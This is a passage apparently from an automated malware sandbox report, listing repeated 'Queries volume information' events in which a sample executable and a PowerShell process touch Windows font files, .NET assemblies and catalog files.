Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
